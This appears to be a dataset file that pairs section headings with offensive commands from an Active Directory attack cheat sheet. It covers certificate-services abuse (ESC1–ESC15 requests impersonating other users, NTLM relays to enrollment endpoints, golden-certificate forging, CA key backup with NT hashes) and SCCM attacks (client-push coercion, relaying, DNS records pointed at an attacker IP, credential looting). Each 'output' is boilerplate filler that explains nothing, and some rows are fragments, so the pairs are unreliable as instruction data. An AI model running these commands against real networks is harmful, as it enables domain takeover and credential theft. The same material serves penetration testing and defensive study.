instruction
stringclasses
270 values
input
stringlengths
3
214
output
stringclasses
297 values
Enumeration
certipy find -u <user>@<domain> -p <password> -dc-ip <dc_ip>
Note or procedural step under 'Enumeration'.
Enumeration
ldeep ldap -u <user> -p <password> -d <domain> -s <dc_ip> templates
Note or procedural step under 'Enumeration'.
Enumeration
Get PKI objects information
Note or procedural step under 'Enumeration'.
Enumeration
certify.exe pkiobjects
Note or procedural step under 'Enumeration'.
Enumeration
Display CA information
Note or procedural step under 'Enumeration'.
Enumeration
certutil -TCAInfo
Note or procedural step under 'Enumeration'.
Enumeration
certify.exe cas
Note or procedural step under 'Enumeration'.
Web Enrollment Is Up
ESC8
Note or procedural step under 'Web Enrollment Is Up'.
Web Enrollment Is Up
ntlmrelayx.py -t http://<dc_ip>/certsrv/certfnsh.asp -debug -smb2support --adcs --template DomainController
Note or procedural step under 'Web Enrollment Is Up'.
Web Enrollment Is Up
Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
Tool or command referenced under 'Web Enrollment Is Up'.
Web Enrollment Is Up
gettgtpkinit.py -pfx-base64 $(cat cert.b64) <domain>/<dc_name>$ <ccache_file>
Note or procedural step under 'Web Enrollment Is Up'.
Web Enrollment Is Up
certipy relay -target http://<ip_ca>
Note or procedural step under 'Web Enrollment Is Up'.
Web Enrollment Is Up
certipy auth -pfx <certificate> -dc-ip <dc_ip>
Note or procedural step under 'Web Enrollment Is Up'.
Misconfigured Certificate Template
ESC1
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name> -upn <target_user>@<domain>
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certify.exe request /ca:<server>\<ca-name> /template:"<vulnerable template name>" [/altname:"Admin"]
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
ESC2
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
ESC3
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
ESC3
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certify.exe request /ca:<server>\<ca-name> /template:"<vulnerable template name>"
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certify.exe request request /ca:<server>\<ca-name> /template:<template> /onbehalfof:<domain>\<user> /enrollcert:<path.pfx> [/enrollcertpw:<cert-password>]
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name>
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name>
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
ESC13
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name>
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certify.exe request /ca:<server>\<ca-name> /template:"<vulnerable template name>"
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
ESC15
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<version 1 template with enrolee flag>' -ca <ca_name> -upn <target_user>@<domain> --application-policies 'Client Authentication' #[PR 228]
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<version 1 template with enrolee flag>' -ca <ca_name> --application-policies 'Certificate Request Agent' # [PR 228]
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name> -on-behalf-of '<domain>\<user>' -pfx <cert>
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured ACL
ESC4
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
write privilege over a certificate template
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
certipy template -u <user>@<domain> -p '<password>' -template <vuln_template> -save-old -debug
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
ESC1
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
restore template
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
certipy template -u <user>@<domain> -p '<password>' -template <vuln_template> -configuration <template>.json
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
ESC7
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
Manage CA
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
certipy ca -ca <ca_name> -add-officer '<user>' -username <user>@<domain> -password <password> -dc-ip <dc_ip> -target-ip <target_ip>
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
ESC7 Manage certificate
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
Manage certificate
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
certipy ca -ca <ca_name> -enable-template '<ecs1_vuln_template>' -username <user>@<domain> -password <password>
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
certipy req -username <user>@<domain> -password <password> -ca <ca_name> -template '<vulnerable template name>' -upn '<target_user>
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
error, but save private key and get issue request
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
Issue request
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
certipy ca -u <user>@<domain> -p '<password>' -ca <ca_name> -issue-request <request_id>
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
certipy req -u <user>@<domain> -p '<password>' -ca <ca_name> -retreive <request_id> #Pass the certificate
Note or procedural step under 'Misconfigured ACL'.
Vulnerable PKI Object access control
ESC5
Note or procedural step under 'Vulnerable PKI Object access control'.
Vulnerable PKI Object access control
Vulnerable acl on PKI
Note or procedural step under 'Vulnerable PKI Object access control'.
Vulnerable PKI Object access control
ACL
Note or procedural step under 'Vulnerable PKI Object access control'.
Vulnerable PKI Object access control
Golden certificate
Note or procedural step under 'Vulnerable PKI Object access control'.
Vulnerable PKI Object access control
certipy ca -backup -u <user>@<domain> -hashes <hash_nt> -ca <ca_name> -debug -target <ca_ip>
Note or procedural step under 'Vulnerable PKI Object access control'.
Vulnerable PKI Object access control
certipy forge -ca-pfx '<adcs>.pfx' -upn administrator@<domain> # Pass the Certificate
Note or procedural step under 'Vulnerable PKI Object access control'.
Misconfigured Certificate Authority
ESC6
Note or procedural step under 'Misconfigured Certificate Authority'.
Misconfigured Certificate Authority
Abuse ATTRIBUTESUBJECTALTNAME2 flag set on CA you can choose any certificate template that permits client authentication
Note or procedural step under 'Misconfigured Certificate Authority'.
Misconfigured Certificate Authority
ESC1
Note or procedural step under 'Misconfigured Certificate Authority'.
Misconfigured Certificate Authority
ESC11
Note or procedural step under 'Misconfigured Certificate Authority'.
Misconfigured Certificate Authority
ntlmrelayx.py -t rpc://<ca_ip> -smb2support -rpc-mode ICPR -icpr-ca-name <ca_name>
Note or procedural step under 'Misconfigured Certificate Authority'.
Misconfigured Certificate Authority
Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
Tool or command referenced under 'Misconfigured Certificate Authority'.
Misconfigured Certificate Authority
gettgtpkinit.py -pfx-base64 $(cat cert.b64) <domain>/<dc_name>$ <ccache_file>
Note or procedural step under 'Misconfigured Certificate Authority'.
Misconfigured Certificate Authority
certipy relay -target rpc://<ip_ca> -ca '<ca_name>'
Note or procedural step under 'Misconfigured Certificate Authority'.
Misconfigured Certificate Authority
certipy auth -pfx <certificate> -dc-ip <dc_ip> #Pass the Ticket #DCSYNC #Domain Admin
Note or procedural step under 'Misconfigured Certificate Authority'.
Abuse Certificate Mapping
ESC9/ESC10 (implicit)
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
certipy shadow auto -username <accountA>@<domain> -p <passA> -account <accountB>
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
ESC9/ESC10 (Case 1)
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
certipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn Administrator
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
ESC9
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
certipy req -username <accountB>@<domain> -hashes <hashB> -ca <ca_name> -template <vulnerable template> #reset accountB UPN
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
ESC10 (case 1)
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
certipy req -username <accountB>@<domain> -hashes <hashB> -ca <ca_name> -template <any template with client auth> #reset accountB UPN
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
ESC10 (Case 2)
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
certipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn '<dc_name$>@<domain>'
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
ESC10 Case1
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
reset accountB UPN
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
certipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn <accountB>@<domain>
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
[Kerberos Mapping] ESC9/ESC10(Case 1) #Pass The Certificate
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
[Schannel Mapping] ESC9/ESC10 (Case 2) #Pass The Certificate
Note or procedural step under 'Abuse Certificate Mapping'.
Abuse Certificate Mapping
ESC14 (explicit)
Note or procedural step under 'Abuse Certificate Mapping'.
recon
sccmhunter.py find -u <user> -p <password> -d <domain> -dc-ip <dc_ip> -debug
Note or procedural step under 'recon'.
recon
sccmhunter.py show -all
Note or procedural step under 'recon'.
recon
ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> sccm
Note or procedural step under 'recon'.
recon
nxc smb <sccm_server> -u <user> -p <password> -d <domain> --shares
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Creds-1 No credentials
Extract from pxe See no creds
Note or procedural step under 'Creds-1 No credentials'.
Creds-1 No credentials > PXE
NAA credentials
Note or procedural step under 'Creds-1 No credentials > PXE'.
Creds-1 No credentials > PXE
User + Pass
Note or procedural step under 'Creds-1 No credentials > PXE'.
Elevate-1:Relay on site systems Simple user
coerce sccm site server
Note or procedural step under 'Elevate-1:Relay on site systems Simple user'.
Elevate-1:Relay on site systems Simple user
ntlmrelayx.py -tf <site_systems> -smb2support #Admin on Site system
Note or procedural step under 'Elevate-1:Relay on site systems Simple user'.
Elevate-2:Force client push Simple user
ntlmrelayx.py -t <sccm_server> -smb2support -socks # listen connection
Note or procedural step under 'Elevate-2:Force client push Simple user'.
Elevate-2:Force client push Simple user
SharpSCCM.exe invoke client-push -mp <sccm_server>.<domain> -sc <site_code> -t <attacker_ip> # Launch client push install
Note or procedural step under 'Elevate-2:Force client push Simple user'.
Elevate-2:Force client push Simple user
proxychains smbexec.py -no-pass <domain>/<socks_user>@<sccm_server>
Note or procedural step under 'Elevate-2:Force client push Simple user'.
Elevate-2:Force client push Simple user
cleanup #Admin
Note or procedural step under 'Elevate-2:Force client push Simple user'.
Elevate-3:Automatic client push Simple user
Create DNS A record for non existing computer x
Note or procedural step under 'Elevate-3:Automatic client push Simple user'.
Elevate-3:Automatic client push Simple user
dnstool.py -u '<domain>\<user>' -p <pass> -r <newcomputer>.<domain> -a add -t A -d <attacker_ip> <dc_ip>
Note or procedural step under 'Elevate-3:Automatic client push Simple user'.
Elevate-3:Automatic client push Simple user
Enroll new computer x in AD then remove host SPN from the machine account
Note or procedural step under 'Elevate-3:Automatic client push Simple user'.
Elevate-3:Automatic client push Simple user
setspn -D host/<newcomputer> <newcomputer> setspn -D host/<newcomputer>.<domain> <newcomputer>
Note or procedural step under 'Elevate-3:Automatic client push Simple user'.
Elevate-3:Automatic client push Simple user
wait 5m for client push
Note or procedural step under 'Elevate-3:Automatic client push Simple user'.
Elevate-3:Automatic client push Simple user
ntlmrelayx.py -tf <no_signing_target> -smb2support -socks
Note or procedural step under 'Elevate-3:Automatic client push Simple user'.
Elevate-3:Automatic client push Simple user
cleanup #Relay ntlm
Note or procedural step under 'Elevate-3:Automatic client push Simple user'.
CRED-6 Loot creds
SCCM SMB service (445/TCP) on a DP
Note or procedural step under 'CRED-6 Loot creds'.
CRED-6 Loot creds
cmloot.py <domain>/<user>:<password>@<sccm_dp> -cmlootinventory sccmfiles.txt
Note or procedural step under 'CRED-6 Loot creds'.